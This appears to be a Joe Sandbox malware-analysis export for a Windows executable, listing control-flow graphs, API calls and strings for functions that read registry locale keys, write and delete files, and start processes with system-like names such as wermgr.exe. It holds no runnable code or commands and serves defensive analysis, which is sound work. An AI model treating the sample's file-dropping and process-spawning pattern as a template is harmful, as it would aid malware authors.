      control_flow_graph 5190 40d074-40d09d call 409d7c 5193 40d0b4-40d0c9 call 40a928 call 40c8a8 5190->5193 5194 40d09f-40d0b2 GetModuleFileNameW 5190->5194 5195 40d0ce-40d0d6 5193->5195 5194->5195 5198 40d283-40d298 call 409c98 5195->5198 5199 40d0dc-40d0fd RegOpenKeyExW 5195->5199 5202 40d103-40d11f RegOpenKeyExW 5199->5202 5203 40d19d-40d1d7 call 40ce84 RegQueryValueExW 5199->5203 5202->5203 5204 40d121-40d13d RegOpenKeyExW 5202->5204 5210 40d1d9-40d20a call 406e70 RegQueryValueExW call 40a990 5203->5210 5211 40d20c-40d226 RegQueryValueExW 5203->5211 5204->5203 5207 40d13f-40d15b RegOpenKeyExW 5204->5207 5207->5203 5209 40d15d-40d179 RegOpenKeyExW 5207->5209 5209->5203 5212 40d17b-40d197 RegOpenKeyExW 5209->5212 5214 40d257-40d268 5210->5214 5211->5214 5215 40d228-40d252 call 406e70 RegQueryValueExW call 40a990 5211->5215 5212->5198 5212->5203 5216 40d272-40d27b RegCloseKey 5214->5216 5217 40d26a-40d26d call 406e8c 5214->5217 5215->5214 5217->5216
      APIs
      • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D299,?,?), ref: 0040D0AD
      • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299,?,?), ref: 0040D0F6
      • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299,?,?), ref: 0040D118
      • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040D136
      • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040D154
      • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040D172
      • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040D190
      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299), ref: 0040D1D0
      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040D27C,?,80000001), ref: 0040D1FB
      • RegCloseKey.ADVAPI32(?,0040D283,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales), ref: 0040D276
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Open$QueryValue$CloseFileModuleName
      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
      • API String ID: 2701450724-3496071916
      • Opcode ID: c16a4baa85a35aa069bdc9d48d9af1adabbe8df825a8c4347384d09cbe66599f
      • Instruction ID: 784b775982057c7c0034e0750c3c3b6630d9eee3212a56f647cfdb8ae3a704e6
      • Opcode Fuzzy Hash: c16a4baa85a35aa069bdc9d48d9af1adabbe8df825a8c4347384d09cbe66599f
      • Instruction Fuzzy Hash: 8051E175E80608BEEB10EAD5CC46FAFB3ACDB48704F5044BBBA14F61C1D6789A448A5D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00873BF4 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 423COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 5225 873bf4-873bf7 5226 873bfc-873c01 5225->5226 5226->5226 5227 873c03-873c33 call 40a0c0 5226->5227 5230 873e5f-873ebc call 40a0c0 call 40acec call 40a0c0 * 6 5227->5230 5231 873c39-873c5b call 40a0c0 * 2 5227->5231 5275 873ec1-873f1f call 40a0c0 * 4 call 4076f4 5230->5275 5240 873c5d-873c65 5231->5240 5241 873c68-873c6c 5231->5241 5240->5241 5243 873cc6-873cf1 call 40a0c0 * 2 5241->5243 5244 873c6e-873cc1 call 40a0c0 * 4 call 40acec call 40a0c0 5241->5244 5259 873cf7-873e5d call 40a3c0 * 5 call 6ba5a8 * 2 call 40a3c0 * 3 call 40a494 call 40a9e8 call 40acec call 40a0c0 * 2 5243->5259 5260 873cf3 5243->5260 5244->5275 5259->5275 5260->5259 5299 873f21-873f29 5275->5299 5300 873f2c-873f33 5275->5300 5299->5300 5302 873f35-873f56 call 40a0c0 call 4076f4 call 40a0c0 5300->5302 5303 873f5b-873fb4 call 4076e8 GetWindowsDirectoryW call 409e50 5300->5303 5302->5303 5317 873fb7-873fe1 call 40a0c0 5303->5317 5325 873fe3-874049 call 4076f4 5317->5325 5326 87404b-87409f call 4076f4 5317->5326 5334 8740a4-8740bb 5325->5334 5326->5334 5334->5317 5336 8740c1-8740d6 5334->5336 5338 8740ea-8740ef 5336->5338 5339 8740d8-8740e8 call 4076e8 5336->5339 5341 8740f4-87414b call 40a0c0 call 8736f0 call 40a830 5338->5341 5339->5341 5349 874170-8741db call 40acec call 40a0c0 * 5 5341->5349 5350 87414d-874158 call 871424 5341->5350 5367 8741dd-8741e5 call 40a0c0 5349->5367 5368 8741ea-8741f8 5349->5368 5353 87415d-87416b call 40a730 5350->5353 5353->5349 5367->5368 5370 874216-874227 call 40a0c0 * 2 5368->5370 5371 8741fa-874214 call 4076f4 5368->5371 5377 87422c-87429c call 40acec call 40a0c0 * 3 call 409ce0 call 409d28 call 409cf8 5370->5377 5371->5377
      APIs
      • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,008741CB,?,00000074,00000000,0087429D,?,?,?,?,0000004D,00000000,00000000), ref: 00873F9C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: DirectoryWindows
      • String ID: $AuthFWWizFwk.Resources.dll$F$LCMapStringW$PropSysAllocString$RtlIpv6StringToAddressW$SetDynamicTimeZoneInformation$TaskScheduler.resources.dll$ZwSinglePhaseReject$gpupdate.exe$icmp.dll$msdtctm.dll$twunk_16.exe
      • API String ID: 3619848164-1532618243
      • Opcode ID: acc7d45c5d09796f28b1fbf20f33f42f7064414b2dff55cd065bfb5ff4eefc6d
      • Instruction ID: ba7d8b23c050632f8c4c162896acf9b3919604f37f090ebbf848f84c3faf45e5
      • Opcode Fuzzy Hash: acc7d45c5d09796f28b1fbf20f33f42f7064414b2dff55cd065bfb5ff4eefc6d
      • Instruction Fuzzy Hash: 76123934918219DFDB00EFA8D881ADDB7B5FB49314F1080AAE448F37A5D734AA55CF25
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0087E220 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 560fileCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 5392 87e220-87e224 5393 87e229-87e22e 5392->5393 5393->5393 5394 87e230-87e27a call 409d9c call 40aa08 call 4235f0 5393->5394 5401 87e9c4-87e9ee call 40a71c CreateFileW 5394->5401 5402 87e280-87e28e 5394->5402 5412 87e9f4-87e9f6 5401->5412 5413 87ea8c-87eac6 call 409d28 call 409c98 call 409cf8 call 409ce0 5401->5413 5404 87e294-87e29d 5402->5404 5405 87e8b1-87e8c0 call 40acb4 5402->5405 5407 87e2f5-87e2fe 5404->5407 5408 87e29f-87e2f3 call 40a0c0 * 4 call 40acec call 40a0c0 5404->5408 5421 87e906-87e945 call 40acec call 40a0c0 * 2 call 40acec 5405->5421 5422 87e8c2-87e8e9 call 40a0c0 * 4 5405->5422 5410 87e976-87e9a8 call 40a0c0 * 4 5407->5410 5411 87e304-87e32b call 40acec 5407->5411 5408->5407 5477 87e9b5-87e9be call 40a71c DeleteFileW 5410->5477 5478 87e9aa-87e9b0 call 40a0c0 5410->5478 5432 87e331-87e342 5411->5432 5433 87e32d 5411->5433 5419 87e9f9-87ea16 call 40acec 5412->5419 5443 87ea18-87ea86 call 40a0c0 call 4076f4 call 40a0c0 call 40acec WriteFile CloseHandle 5419->5443 5481 87e94a-87e971 call 40acec * 2 5421->5481 5483 87e8ee-87e904 call 40a0c0 * 2 5422->5483 5440 87e344 5432->5440 5441 87e348-87e359 5432->5441 5433->5432 5440->5441 5450 87e35f-87e370 5441->5450 5451 87e35b 5441->5451 5443->5413 5454 87e376-87e387 5450->5454 5455 87e372 5450->5455 5451->5450 5464 87e38d-87e65a call 40a3c0 * 25 call 40a494 call 40a9e8 call 40a0c0 5454->5464 5465 87e389 5454->5465 5455->5454 5553 87e660-87e671 5464->5553 5554 87e65c 5464->5554 5465->5464 5477->5401 5478->5477 5481->5410 5483->5410 5555 87e677-87e8ac call 40a3c0 * 11 call 6ba5a8 * 3 call 40a3c0 * 4 call 40a494 call 40a9e8 call 40a0c0 call 40acec 5553->5555 5556 87e673 5553->5556 5554->5553 5555->5410 5556->5555
      APIs
      • DeleteFileW.KERNEL32(00000000,0000000E,0089B60B,00000004,0000000E,00000000,0087EAC7,?,?,?,?,0000001F,00000000,00000000,00000000), ref: 0087E9BE
      • CreateFileW.KERNELBASE(00000000,C0000000,00000003,?,00000001,00000080,00000000,00000000,0087EAC7,?,?,?,?,0000001F,00000000,00000000), ref: 0087E9E1
      • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000,?,?,?,?,?,?,0000001F,00000000,00000000,00000000), ref: 0087EA73
      • CloseHandle.KERNEL32(000000FF,?,?,?,?,0000001F,00000000,00000000,00000000,?,0089A09E,?,EDBF3FA1,?,?,0089B6AC), ref: 0087EA86
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: File$CloseCreateDeleteHandleWrite
      • String ID: $ $ $ $ $ $ $MsRdpWebAccess.dll$Sentinel.v3.5Client.dll
      • API String ID: 656945655-3794073312
      • Opcode ID: 6cb3a58435a4873310c62eeb0016106c44c5d8e3982b09b646eec5b19ab1beca
      • Instruction ID: b977a249fb2273753ed32700527da0275b03f1a2078872caa0bd0b7dcb6d9bb2
      • Opcode Fuzzy Hash: 6cb3a58435a4873310c62eeb0016106c44c5d8e3982b09b646eec5b19ab1beca
      • Instruction Fuzzy Hash: 9C424E3490424E9FDB05DFA0C891BDDBBB6FF4A308F1080A6E544B7392D635AA59CF15
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0087518C Relevance: 20.1, APIs: 1, Strings: 10, Instructions: 806processCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 5601 87518c-8751f5 call 409d9c 5604 8752d0-875301 call 40a0c0 * 2 call 40acec call 40a0c0 5601->5604 5605 8751fb-875253 call 40a0c0 * 4 5601->5605 5620 875306-87530f 5604->5620 5625 875255-875296 call 40a0c0 * 6 5605->5625 5626 87529b-8752ce call 40acec * 2 call 40a0c0 5605->5626 5622 875345-875391 call 40a0c0 * 4 5620->5622 5623 875311-875340 call 40a0c0 * 2 call 40acec call 40a0c0 5620->5623 5656 875397-875399 5622->5656 5657 8754cd-875514 call 85e4bc call 4077e8 5622->5657 5623->5622 5625->5626 5626->5620 5660 87539c-8753f2 call 4076f4 5656->5660 5671 875517-87552c 5657->5671 5667 8753f4-875405 5660->5667 5669 875407-875467 call 4076f4 5667->5669 5670 875469-8754c8 call 4076e8 call 4076f4 5667->5670 5669->5657 5670->5657 5672 87552f-87559a call 4076f4 * 2 5671->5672 5683 87559c-8755c0 call 407278 5672->5683 5686 8755c2-87562a call 4076f4 * 2 call 4076e8 5683->5686 5687 87562c-87567f 5683->5687 5688 875684-8756a3 call 4076f4 5686->5688 5687->5688 5688->5671 5694 8756a9-87572e call 870fd8 call 87301c call 4076f4 5688->5694 5704 875730-875738 5694->5704 5705 87573b-87573f 5694->5705 5704->5705 5706 875745-87574e 5705->5706 5707 875828-875833 5705->5707 5710 875750-8757b8 call 4076e8 5706->5710 5711 8757ba-8757c0 5706->5711 5708 875835-875896 call 4076f4 5707->5708 5709 875898-8758ec call 4076e8 * 2 5707->5709 5717 8758f1-875910 5708->5717 5709->5717 5710->5711 5712 8757c2-875814 5711->5712 5713 875819-875823 5711->5713 5712->5713 5713->5717 5722 875912-87591d call 40a0c0 5717->5722 5723 87591f-875934 call 4076e8 5717->5723 5729 875939-875962 call 407278 5722->5729 5723->5729 5732 875a42-875a72 call 40acec call 40acb4 5729->5732 5733 875968-87597d 5729->5733 5744 875a74-875a7a call 40a0c0 5732->5744 5745 875a7f-875aa3 call 40acec 5732->5745 5734 87597f-8759e7 call 4076e8 5733->5734 5735 8759e9-875a3d call 4076f4 5733->5735 5734->5732 5735->5732 5744->5745 5749 875aa5 5745->5749 5750 875aa9-875aba 5745->5750 5749->5750 5751 875ac0-875c4a call 40a324 call 40a34c call 40a444 call 40a3c0 * 7 call 40a494 call 40a9e8 call 40a0c0 * 2 call 40a71c CreateProcessW 5750->5751 5752 875abc 5750->5752 5783 875c94-875ca5 5751->5783 5784 875c4c-875c8f call 4076f4 call 87301c 5751->5784 5752->5751 5786 875ca7-875cb7 call 4076e8 5783->5786 5787 875cbc-875cca 5783->5787 5784->5783 5786->5787 5788 875cd5-875cf0 5787->5788 5789 875ccc-875cd2 5787->5789 5793 875d63-875d7e 5788->5793 5794 875cf2-875d07 5788->5794 5789->5788 5797 875d80-875d89 5793->5797 5798 875de9-875df3 5793->5798 5794->5793 5796 875d09-875d5e 5794->5796 5796->5793 5799 875d8b-875de7 call 4076f4 call 4076e8 5797->5799 5800 875df8-875e35 call 40acec call 40a0c0 call 40acb4 5797->5800 5798->5800 5799->5800 5812 875e37-875e4a call 40acec 5800->5812 5813 875e4c-875e70 call 8744f4 5800->5813 5817 875e75-875ed6 call 4076e8 call 407278 call 409d28 * 2 call 409c98 call 409ce0 5812->5817 5813->5817
      APIs
        • Part of subcall function 00409D9C: SysAllocStringLen.OLEAUT32(?,?), ref: 00409DAA
      • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,?,00876004,?,?), ref: 00875C42
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: AllocCreateProcessString
      • String ID: $ $D$EhStorAPI.dll$K$Microsoft.Build.Utilities.dll$msnetobj.dll$netprofm.dll$nlscoremig.dll$wermgr.exe
      • API String ID: 1156770731-390117768
      • Opcode ID: a9b1256ad7a3073b1a1e669d767d624d9c97eea52f4cf8dcbe49ca3b784a5162
      • Instruction ID: ca8db5ffbe4782aa474916890c15ff25a00fd708b7f9831b0c757001128647e3
      • Opcode Fuzzy Hash: a9b1256ad7a3073b1a1e669d767d624d9c97eea52f4cf8dcbe49ca3b784a5162
      • Instruction Fuzzy Hash: E082E675908228CFEB00DF6DE981A8DBBF5FB0A314F10806AE499E7B61D734A945CF15
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00410820 Relevance: 13.8, APIs: 9, Instructions: 258COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 6465 410820-4108ba call 410cd0 call 410ce0 call 410cf0 call 410d00 * 3 6478 4108e4-4108f1 6465->6478 6479 4108bc-4108df RaiseException 6465->6479 6481 4108f3 6478->6481 6482 4108f6-410916 6478->6482 6480 410af4-410afa 6479->6480 6481->6482 6483 410929-410931 6482->6483 6484 410918-410927 call 410d10 6482->6484 6485 410934-41093d 6483->6485 6484->6485 6487 410956-410958 6485->6487 6488 41093f-41094f 6485->6488 6490 410a1a-410a24 6487->6490 6491 41095e-410965 6487->6491 6488->6487 6497 410951 6488->6497 6495 410a34-410a36 6490->6495 6496 410a26-410a32 6490->6496 6493 410975-410977 6491->6493 6494 410967-410973 6491->6494 6498 410984-410986 6493->6498 6499 410979-410982 LoadLibraryA 6493->6499 6494->6493 6500 410a83-410a85 6495->6500 6501 410a38-410a3c 6495->6501 6496->6495 6504 410ad2-410ad9 6497->6504 6508 4109d3-4109df call 4101a4 6498->6508 6509 410988-410997 GetLastError 6498->6509 6499->6498 6505 410a87-410a96 GetLastError 6500->6505 6506 410acd-410ad0 6500->6506 6502 410a77-410a81 GetProcAddress 6501->6502 6503 410a3e-410a42 6501->6503 6502->6500 6503->6502 6513 410a44-410a4f 6503->6513 6511 410af2 6504->6511 6512 410adb-410aea 6504->6512 6515 410aa6-410aa8 6505->6515 6516 410a98-410aa4 6505->6516 6506->6504 6525 4109e1-4109e5 6508->6525 6526 410a14-410a15 FreeLibrary 6508->6526 6517 4109a7-4109a9 6509->6517 6518 410999-4109a5 6509->6518 6511->6480 6512->6511 6513->6502 6519 410a51-410a57 6513->6519 6515->6506 6522 410aaa-410aca RaiseException 6515->6522 6516->6515 6517->6508 6520 4109ab-4109ce RaiseException 6517->6520 6518->6517 6519->6502 6524 410a59-410a66 6519->6524 6520->6480 6522->6506 6524->6502 6528 410a68-410a73 6524->6528 6525->6490 6529 4109e7-4109f5 LocalAlloc 6525->6529 6526->6490 6528->6502 6530 410a75 6528->6530 6529->6490 6531 4109f7-410a12 6529->6531 6530->6506 6531->6490
      APIs
      • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004108D8
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: ExceptionRaise
      • String ID:
      • API String ID: 3997070919-0
      • Opcode ID: c83b337babfb9c57bacd769e525762f8530e5949d6679a35cf9f9d6431fbfede
      • Instruction ID: cc74c8f84af166c31608546b291aaa01305dc17240101f97f26116069fbfe04c
      • Opcode Fuzzy Hash: c83b337babfb9c57bacd769e525762f8530e5949d6679a35cf9f9d6431fbfede
      • Instruction Fuzzy Hash: BCA18275901309AFEB10DFA8D880BEEB7B5BF68350F14851AE505A7381DBB8A9C4CB54
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004235F0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 6532 4235f0-423609 call 40a928 GetFileAttributesW 6535 42365a-423664 GetLastError 6532->6535 6536 42360b-42360e 6532->6536 6539 423666-423669 6535->6539 6540 42367b-42367d 6535->6540 6537 423653-423658 6536->6537 6538 423610-423612 6536->6538 6541 423681-423684 6537->6541 6542 423614-423616 6538->6542 6543 423618-42361a 6538->6543 6539->6540 6544 42366b-42366e 6539->6544 6540->6541 6542->6541 6545 423620-423638 CreateFileW 6543->6545 6546 42361c-42361e 6543->6546 6544->6540 6547 423670-423679 call 4235b0 6544->6547 6548 423644-423651 GetLastError 6545->6548 6549 42363a-423642 CloseHandle 6545->6549 6546->6541 6547->6540 6552 42367f 6547->6552 6548->6541 6549->6541 6552->6541
      APIs
      • GetFileAttributesW.KERNEL32(00000000,?,?,?,00899A4F,EDBF3FA1,?,?,0089B6AC,?,00000074,008B08D8,0089B6AC,00000000,00000074,00000003), ref: 00423601
      • GetLastError.KERNEL32(00000000,?,?,?,00899A4F,EDBF3FA1,?,?,0089B6AC,?,00000074,008B08D8,0089B6AC,00000000,00000074,00000003), ref: 0042365A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: AttributesErrorFileLast
      • String ID: ${
      • API String ID: 1799206407-4046706400
      • Opcode ID: 2c20f6e4d347156d041b77a40ff58360d59760c45fcc539db687fd3a2ee4ed79
      • Instruction ID: 5296c2e639daefdb2afce18ca50f6ccf0aaa853e04935079694202e18e93c5cc
      • Opcode Fuzzy Hash: 2c20f6e4d347156d041b77a40ff58360d59760c45fcc539db687fd3a2ee4ed79
      • Instruction Fuzzy Hash: 8301B53430423034D9352DB92D867BB016C4B9A7AAFE9091BF951A73D1D24D4A57116E
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00405CEC Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 6553 405cec-405cfb 6554 405d01-405d05 6553->6554 6555 405de4-405de7 6553->6555 6556 405d07-405d0e 6554->6556 6557 405d68-405d71 6554->6557 6558 405ed4-405ed8 6555->6558 6559 405ded-405df7 6555->6559 6561 405d10-405d1b 6556->6561 6562 405d3c-405d3e 6556->6562 6557->6556 6560 405d73-405d7c 6557->6560 6565 405778-40579d call 4056c8 6558->6565 6566 405ede-405ee3 6558->6566 6563 405da8-405db5 6559->6563 6564 405df9-405e05 6559->6564 6560->6557 6567 405d7e-405d92 Sleep 6560->6567 6570 405d24-405d39 6561->6570 6571 405d1d-405d22 6561->6571 6574 405d40-405d51 6562->6574 6575 405d53 6562->6575 6563->6564 6568 405db7-405dc0 6563->6568 6572 405e07-405e0a 6564->6572 6573 405e3c-405e4a 6564->6573 6584 4057b9-4057c0 6565->6584 6585 40579f-4057ae VirtualFree 6565->6585 6567->6556 6578 405d98-405da3 Sleep 6567->6578 6568->6563 6579 405dc2-405dd6 Sleep 6568->6579 6577 405e0e-405e12 6572->6577 6576 405e4c-405e51 call 405540 6573->6576 6573->6577 6574->6575 6581 405d56-405d63 6574->6581 6575->6581 6576->6577 6586 405e54-405e61 6577->6586 6587 405e14-405e1a 6577->6587 6578->6557 6579->6564 6583 405dd8-405ddf Sleep 6579->6583 6581->6559 6583->6563 6594 4057c2-4057de VirtualQuery VirtualFree 6584->6594 6590 4057b0-4057b2 6585->6590 6591 4057b4-4057b7 6585->6591 6586->6587 6589 405e63-405e6a call 405540 6586->6589 6592 405e6c-405e76 6587->6592 6593 405e1c-405e3a call 405580 6587->6593 6589->6587 6600 4057f3-4057f5 6590->6600 6591->6600 6598 405ea4-405ed1 call 4055e0 6592->6598 6599 405e78-405ea0 VirtualFree 6592->6599 6595 4057e0-4057e3 6594->6595 6596 4057e5-4057eb 6594->6596 6595->6600 6596->6600 6603 4057ed-4057f1 6596->6603 6604 4057f7-405807 6600->6604 6605 40580a-40581a 6600->6605 6603->6594 6604->6605
      APIs
      • Sleep.KERNEL32(00000000,?,?,00000000,0040595E), ref: 00405D82
      • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040595E), ref: 00405D9C
      Memory Dump Source
      • Source File: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: Sleep
      • String ID:
      • API String ID: 3472027048-0
      • Opcode ID: f49346c1b323bdaf12b22f604e07d0e5f18810d7551814f018ea3096b6f6177c
      • Instruction ID: e3b3088ac697dbb74b222dcab15eadb8e91f4f9b8652a3d50a98c4b81140dedd
      • Opcode Fuzzy Hash: f49346c1b323bdaf12b22f604e07d0e5f18810d7551814f018ea3096b6f6177c
      • Instruction Fuzzy Hash: 4E71B031605A108BE715DB29C888B17BBD4EF86314F18C2BFE448AB3D2D7B89841DF95
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00405968 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 6609 405968-40597a 6610 405980-405990 6609->6610 6611 405bc8-405bcd 6609->6611 6614 405992-40599f 6610->6614 6615 4059e8-4059f1 6610->6615 6612 405ce0-405ce3 6611->6612 6613 405bd3-405be4 6611->6613 6619 405714-40573d VirtualAlloc 6612->6619 6620 405ce9-405ceb 6612->6620 6617 405be6-405c02 6613->6617 6618 405b8c-405b99 6613->6618 6621 4059a1-4059ae 6614->6621 6622 4059b8-4059c4 6614->6622 6615->6614 6616 4059f3-4059ff 6615->6616 6616->6614 6628 405a01-405a0d 6616->6628 6629 405c10-405c1f 6617->6629 6630 405c04-405c0c 6617->6630 6618->6617 6625 405b9b-405ba4 6618->6625 6631 40576f-405775 6619->6631 6632 40573f-40576c call 4056c8 6619->6632 6623 4059b0-4059b4 6621->6623 6624 4059d8-4059e5 6621->6624 6626 4059c6-4059d4 6622->6626 6627 405a3c-405a45 6622->6627 6625->6618 6633 405ba6-405bba Sleep 6625->6633 6639 405a80-405a8a 6627->6639 6640 405a47-405a54 6627->6640 6628->6614 6634 405a0f-405a1b 6628->6634 6637 405c21-405c35 6629->6637 6638 405c38-405c40 6629->6638 6635 405c6c-405c82 6630->6635 6632->6631 6633->6617 6645 405bbc-405bc3 Sleep 6633->6645 6634->6615 6646 405a1d-405a2d Sleep 6634->6646 6643 405c84-405c92 6635->6643 6644 405c9b-405ca7 6635->6644 6637->6635 6648 405c42-405c5a 6638->6648 6649 405c5c-405c5e call 40564c 6638->6649 6641 405afc-405b08 6639->6641 6642 405a8c-405ab7 6639->6642 6640->6639 6650 405a56-405a5f 6640->6650 6656 405b30-405b3f call 40564c 6641->6656 6657 405b0a-405b1c 6641->6657 6651 405ad0-405ade 6642->6651 6652 405ab9-405ac7 6642->6652 6643->6644 6653 405c94 6643->6653 6654 405cc8 6644->6654 6655 405ca9-405cbc 6644->6655 6645->6618 6646->6614 6658 405a33-405a3a Sleep 6646->6658 6659 405c63-405c6b 6648->6659 6649->6659 6650->6640 6660 405a61-405a75 Sleep 6650->6660 6663 405ae0-405afa call 405580 6651->6663 6664 405b4c 6651->6664 6652->6651 6662 405ac9 6652->6662 6653->6644 6665 405ccd-405cdf 6654->6665 6655->6665 6666 405cbe-405cc3 call 405580 6655->6666 6671 405b51-405b8a 6656->6671 6677 405b41-405b4b 6656->6677 6667 405b20-405b2e 6657->6667 6668 405b1e 6657->6668 6658->6615 6660->6639 6670 405a77-405a7e Sleep 6660->6670 6662->6651 6663->6671 6664->6671 6666->6665 6667->6671 6668->6667 6670->6640
      APIs
      • Sleep.KERNEL32(00000000,FFFFFFDC,00405936), ref: 00405A1F
      • Sleep.KERNEL32(0000000A,00000000,FFFFFFDC,00405936), ref: 00405A35
      • Sleep.KERNEL32(00000000,?,?,FFFFFFDC,00405936), ref: 00405A63
      • Sleep.KERNEL32(0000000A,00000000,?,?,FFFFFFDC,00405936), ref: 00405A79
      Memory Dump Source
